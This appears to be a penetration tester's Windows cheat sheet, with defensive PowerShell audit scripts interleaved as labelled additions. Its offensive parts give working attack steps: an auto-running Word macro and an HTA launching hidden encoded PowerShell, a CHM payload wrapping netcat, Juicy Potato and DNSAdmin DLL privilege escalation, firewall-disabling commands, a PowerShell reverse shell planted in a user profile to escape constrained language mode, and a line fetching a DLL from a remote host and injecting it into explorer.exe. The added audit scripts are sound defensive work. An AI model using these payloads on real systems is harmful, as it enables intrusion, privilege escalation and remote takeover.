xct's notes
Windows

CHM

Use a Windows VM, install the required tools from here, then get the script Out-CHM.ps1 and create your payload:

Out-CHM -Payload C:\Windows\System32\spool\drivers\color\nc.exe -HHCPath "C:\Program Files (x86)\HTML Help Workshop"

Juicy Potato

Metasploit (Details)

use windows/local/ms16_075_reflection_juicy
set SESSION <>
set CLSID <>
Common CLSIDs for the exploit are:
  • {e60687f7-01a1-40aa-86ac-db1cbf673334}
  • {752073A1-23F2-4396-85F0-8FDB879ED0ED}
  • {3c6859ce-230b-48a4-be6c-932c0c202048}
  • {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83}
  • {8F5DF053-3013-4dd8-B5F4-88214E81C0CF}
  • More can be found here

Word Macro

Simple Word macro (View > Macros; at the end use "File > Information > Check For Issues" to purge personal details), save as .doc:

Sub DoStuff()
    ' Launches a command through the Windows Script Host shell object
    Dim wsh As Object
    Set wsh = CreateObject("WScript.Shell")
    wsh.Run "<powershell command here>"
    Set wsh = Nothing
End Sub

' Word runs AutoOpen automatically when the document is opened
Sub AutoOpen()
    DoStuff
End Sub
Alternatively we can use an HTA:

<script language="VBScript">
Function DoStuff()
    ' Same WScript.Shell pattern as the macro, executed by mshta.exe
    Dim wsh
    Set wsh = CreateObject("Wscript.Shell")
    wsh.run "powershell -Sta -Nop -Window Hidden -EncodedCommand <blah>"
    Set wsh = Nothing
End Function

DoStuff
' Close the HTA window once the command has been launched
self.close
</script>
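From the defender's side, whether a document like the one above ever gets to run its AutoOpen macro is decided by the Word Trust Center settings. The following PowerShell is an added example, not code from xct's notes: it reads the per-user VBAWarnings value (policy value first, since policy overrides the user's choice) and the policy that blocks macros in files carrying Mark-of-the-Web, and turns them into a finding. The Office version keys it inspects (16.0 and 15.0) are an assumption to adjust for your estate.

```powershell
# Added example, not from xct's notes: report the Word macro settings that decide
# whether an AutoOpen macro runs. Office version keys are an assumption.
$OfficeVersions = @('16.0', '15.0')

# Trust Center macro setting stored in VBAWarnings (Microsoft-documented values)
$VbaWarningLabels = @{
    1 = 'Enable all macros'
    2 = 'Disable all macros with notification'
    3 = 'Disable all macros except digitally signed macros'
    4 = 'Disable all macros without notification'
}

function Get-WordMacroPosture {
    foreach ($ver in $OfficeVersions) {
        $userKey   = "HKCU:\Software\Microsoft\Office\$ver\Word\Security"
        $policyKey = "HKCU:\Software\Policies\Microsoft\Office\$ver\Word\Security"
        if (-not (Test-Path $userKey) -and -not (Test-Path $policyKey)) { continue }

        # A policy value overrides the user's own Trust Center choice
        $vba    = (Get-ItemProperty -Path $policyKey -Name VBAWarnings -ErrorAction SilentlyContinue).VBAWarnings
        $source = 'Policy'
        if ($null -eq $vba) {
            $vba    = (Get-ItemProperty -Path $userKey -Name VBAWarnings -ErrorAction SilentlyContinue).VBAWarnings
            $source = 'User'
        }
        # Absent value means the Trust Center default, "disable with notification"
        if ($null -eq $vba) { $vba = 2; $source = 'Default (not set)' }

        # Policy that blocks macros in files downloaded from the internet (Mark-of-the-Web)
        $motw = (Get-ItemProperty -Path $policyKey -Name blockcontentexecutionfrominternet -ErrorAction SilentlyContinue).blockcontentexecutionfrominternet

        $finding = if ($vba -eq 1) {
            'ALERT: every macro runs without prompting'
        } elseif ($vba -eq 2 -and $motw -ne 1) {
            'REVIEW: user can click through the warning; internet-sourced macros are not blocked by policy'
        } else {
            'OK'
        }

        [pscustomobject]@{
            OfficeVersion       = $ver
            VBAWarnings         = $vba
            Meaning             = $VbaWarningLabels[[int]$vba]
            Source              = $source
            BlockInternetMacros = ($motw -eq 1)
            Finding             = $finding
        }
    }
}

Get-WordMacroPosture | Format-Table -AutoSize
```

Run it in the context of the user whose settings you want to see; the values live under HKCU, so an elevated shell for a different account reports that account's posture, not the logged-on user's.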

Building and Signing MSIs

Use WiX to generate MSI files from XML or to manipulate existing MSI files. A complete example can be seen in the Ethereal Writeup.

Windows Firewall

List rules

netsh advfirewall firewall show rule name=all

Disable Firewall on Windows 7 via cmd

:: sets fDenyTSConnections to 0, which allows inbound Remote Desktop connections
Reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Disable Firewall on Windows 7 via Powershell

# same registry value as the cmd variant above, set to 0
powershell.exe -ExecutionPolicy Bypass -command 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0'

Disable Firewall on any windows via cmd

netsh Advfirewall set allprofiles state off
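The commands in this section change state that is easy to verify afterwards, so a host check that reports it is a useful complement. The following PowerShell is an added example, not code from xct's notes: it parses the output of netsh advfirewall show allprofiles state (English locale assumed) into one object per profile, reads fDenyTSConnections (the value the Reg add / Set-ItemProperty lines flip), and summarizes both as findings. netsh is used rather than Get-NetFirewallProfile so it also works on Windows 7; the sample netsh output at the end is constructed so the parser can be exercised without running netsh.

```powershell
# Added example, not from xct's notes: report firewall profile state and the
# Remote Desktop deny flag, the two settings changed by the commands above.
function Get-FirewallProfileState {
    # Default input is live netsh output; pass -NetshOutput to parse captured text
    param([string[]]$NetshOutput = (netsh advfirewall show allprofiles state))

    $current = $null
    foreach ($line in $NetshOutput) {
        # Section header, e.g. "Domain Profile Settings:"
        if ($line -match '^(?<name>\w+) Profile Settings:') { $current = $Matches.name; continue }
        # Value line inside a section, e.g. "State                                 ON"
        if ($current -and $line -match '^State\s+(?<state>ON|OFF)\s*$') {
            [pscustomobject]@{ Profile = $current; Enabled = ($Matches.state -eq 'ON') }
            $current = $null
        }
    }
}

function Get-RemoteDesktopSetting {
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $v = (Get-ItemProperty -Path $key -Name fDenyTSConnections -ErrorAction SilentlyContinue).fDenyTSConnections
    [pscustomobject]@{
        fDenyTSConnections = $v
        # 0 allows Remote Desktop connections; 1 (the default on a fresh install) denies them
        RdpAllowed         = ($v -eq 0)
    }
}

function Get-HostExposureReport {
    $fw  = @(Get-FirewallProfileState)
    $rdp = Get-RemoteDesktopSetting
    $off = @($fw | Where-Object { -not $_.Enabled } | Select-Object -ExpandProperty Profile)

    $findings = @()
    if ($off.Count -gt 0) { $findings += "ALERT: firewall disabled for profile(s): $($off -join ', ')" }
    if ($rdp.RdpAllowed)  { $findings += 'REVIEW: Remote Desktop connections are allowed (fDenyTSConnections=0)' }
    if ($findings.Count -eq 0) { $findings += 'OK: firewall on for all profiles, Remote Desktop denied' }

    [pscustomobject]@{
        FirewallProfiles   = $fw
        fDenyTSConnections = $rdp.fDenyTSConnections
        Findings           = $findings
    }
}

# Constructed sample of netsh output (not captured from a real host) to exercise the parser
$sample = @(
    'Domain Profile Settings:',
    '----------------------------------------------------------------------',
    'State                                 ON',
    '',
    'Private Profile Settings:',
    '----------------------------------------------------------------------',
    'State                                 OFF',
    ''
)
Get-FirewallProfileState -NetshOutput $sample   # Domain enabled, Private disabled

# Live report for this host
Get-HostExposureReport
```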

Load DLL from System32

Windows 10

RunAs

To run commands with runas, the user has to have logged in at least once.

Tools

Elevate Privileges by loading a custom DLL as DNSAdmin

# requires RSAT
dnscmd <dc> /config /serverlevelplugindll \\<ip>\<dll>

# requires RSAT
$dnssettings = Get-DnsServerSetting -ComputerName <dc> -Verbose
$dnssettings.ServerLevelPluginDll = "\\<ip>\<dll>"
Set-DnsServerSetting -InputObject $dnssettings -ComputerName <dc> -Verbose
Then restart the service:
sc.exe stop dns
sc.exe start dns
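The setting changed above persists in the registry of the DNS server and is only picked up when the DNS service restarts, which makes it a cheap thing to audit on every domain controller. The following PowerShell is an added example, not code from xct's notes: it reads ServerLevelPluginDll from the DNS service parameters key, records the service state and the dns.exe start time, and classifies the value (empty, UNC path, local path outside System32, or other). Running it against a remote host via Invoke-Command is an assumption that requires WinRM access; the sample paths passed at the end are constructed.

```powershell
# Added example, not from xct's notes: audit a DNS server for a configured
# server-level plugin DLL, the value the dnscmd / Set-DnsServerSetting lines set.
function Test-DnsPluginDllPath {
    param([string]$Path)
    # Classify the configured value; an empty value is the normal state
    if ([string]::IsNullOrWhiteSpace($Path)) { return 'OK: no ServerLevelPluginDll configured' }
    if ($Path -like '\\*') { return "ALERT: ServerLevelPluginDll is a UNC path ($Path); the DNS service loads a DLL from the network at next start" }
    if ($Path -notmatch '^[A-Za-z]:\\Windows\\System32\\') { return "REVIEW: ServerLevelPluginDll outside System32: $Path" }
    return "REVIEW: ServerLevelPluginDll configured: $Path (confirm it is an approved plugin)"
}

function Get-DnsPluginDllFinding {
    param([string]$ComputerName = $env:COMPUTERNAME)

    # Probe runs locally or, as an assumption here, over WinRM via Invoke-Command
    $probe = {
        $key  = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
        $dll  = (Get-ItemProperty -Path $key -Name ServerLevelPluginDll -ErrorAction SilentlyContinue).ServerLevelPluginDll
        $svc  = Get-Service -Name DNS -ErrorAction SilentlyContinue
        $proc = Get-Process -Name dns -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Computer     = $env:COMPUTERNAME
            PluginDll    = $dll
            DnsStatus    = $(if ($svc) { [string]$svc.Status } else { 'not installed' })
            # The DLL is loaded when dns.exe starts, so a recent start time next to a
            # freshly set value is the combination worth looking at
            DnsStartTime = $(if ($proc) { $proc.StartTime } else { $null })
        }
    }
    $raw = if ($ComputerName -eq $env:COMPUTERNAME) { & $probe } else {
        Invoke-Command -ComputerName $ComputerName -ScriptBlock $probe
    }

    [pscustomobject]@{
        Computer     = $raw.Computer
        PluginDll    = $raw.PluginDll
        DnsStatus    = $raw.DnsStatus
        DnsStartTime = $raw.DnsStartTime
        Finding      = Test-DnsPluginDllPath -Path $raw.PluginDll
    }
}

# Constructed values showing how each shape of the setting is classified
Test-DnsPluginDllPath -Path ''
Test-DnsPluginDllPath -Path '\\<ip>\<dll>'
Test-DnsPluginDllPath -Path 'C:\Windows\System32\example-plugin.dll'

# Live check of this host (reports OK unless the DNS Server role is installed and the value is set)
Get-DnsPluginDllFinding
```

Because the value is read straight from the registry, the check does not need the DnsServer RSAT module; it does need rights to read HKLM on the target, which a DNS server administrator has.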

DNS Enumeration/Exploitation Tools

GitHub - Kevin-Robertson/Powermad: PowerShell MachineAccountQuota and DNS exploit tools

Bypass JEA

When in constrained language mode (or more):

Read File:

${C:\file.txt}

Write File:

${C:\file.txt} = 'content'

Break out by writing a PowerShell profile (executed whenever PowerShell is started by this user):

${C:\users\<user>\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1} = '$client = New-Object System.Net.Sockets.TCPClient("<ip>",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'

Via Script Blocks:

& { ls }

Custom function:

PS>function xct { ls };
PS>xct
...
These bypasses only work in Constrained Language Mode; a JEA endpoint should normally run in "NoLanguage" mode, where none of them apply.
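A quick way to confirm which of the two modes an endpoint actually gives you is to check from inside the session. The following PowerShell is an added example, not code from xct's notes: it reports the effective language mode of the current runspace and lists the four profile scripts PowerShell evaluates at start-up (the path written in the profile bypass above is the CurrentUserCurrentHost one), with a hash and last-write time for any that exist. In a correctly built NoLanguage JEA endpoint the script cannot run at all, which is the expected outcome; if it runs and reports ConstrainedLanguage, the profile paths are the ones whose write permissions need reviewing.

```powershell
# Added example, not from xct's notes: run inside the session under test to see the
# language mode and the profile scripts that would run on the next start of PowerShell.
function Get-LanguageModeAudit {
    # FullLanguage, ConstrainedLanguage, RestrictedLanguage or NoLanguage
    $mode = [string]$ExecutionContext.SessionState.LanguageMode

    # $PROFILE exposes the four candidate profile paths as note properties
    $scopes = 'AllUsersAllHosts', 'AllUsersCurrentHost', 'CurrentUserAllHosts', 'CurrentUserCurrentHost'
    $profiles = foreach ($scope in $scopes) {
        $path   = $PROFILE.$scope
        $exists = Test-Path -LiteralPath $path -PathType Leaf
        $item   = if ($exists) { Get-Item -LiteralPath $path } else { $null }
        [pscustomobject]@{
            Scope         = $scope
            Path          = $path
            Exists        = $exists
            LastWriteTime = $(if ($item) { $item.LastWriteTime } else { $null })
            Sha256        = $(if ($item) { (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash } else { $null })
        }
    }

    $present = @($profiles | Where-Object Exists)
    $finding = if ($mode -eq 'ConstrainedLanguage' -and $present.Count -gt 0) {
        'ALERT: ConstrainedLanguage with profile script(s) present; review their content and who can write them'
    } elseif ($mode -eq 'ConstrainedLanguage') {
        'REVIEW: ConstrainedLanguage; a writable profile path lifts the restriction on the next start'
    } elseif ($mode -eq 'FullLanguage') {
        'INFO: FullLanguage; nothing to bypass, but also nothing restricted'
    } else {
        "OK: $mode"
    }

    [pscustomobject]@{
        LanguageMode = $mode
        Profiles     = $profiles
        Finding      = $finding
    }
}

$audit = Get-LanguageModeAudit
$audit | Select-Object LanguageMode, Finding
$audit.Profiles | Format-Table Scope, Exists, LastWriteTime, Path -AutoSize
```

Only cmdlets and property reads are used, so the script itself stays within what Constrained Language Mode permits; the hash lets you compare a profile against a known-good copy rather than eyeballing it.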

RCE via Cab Files

Zero Day Initiative — CVE-2020-1300: Remote Code Execution Through Microsoft Windows CAB Files

Reflectively load a DLL into explorer.exe

String cmd = "$bytes = (New-Object System.Net.WebClient).DownloadData('http://<ip>/payload.dll');(New-Object System.Net.WebClient).DownloadString('http://<ip>/Invoke-ReflectivePEInjection.ps1') | IEX; $procid = (Get-Process -Name explorer).Id; Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId $procid";

Dump Sticky Note Contents

Resources

Last modified 4mo ago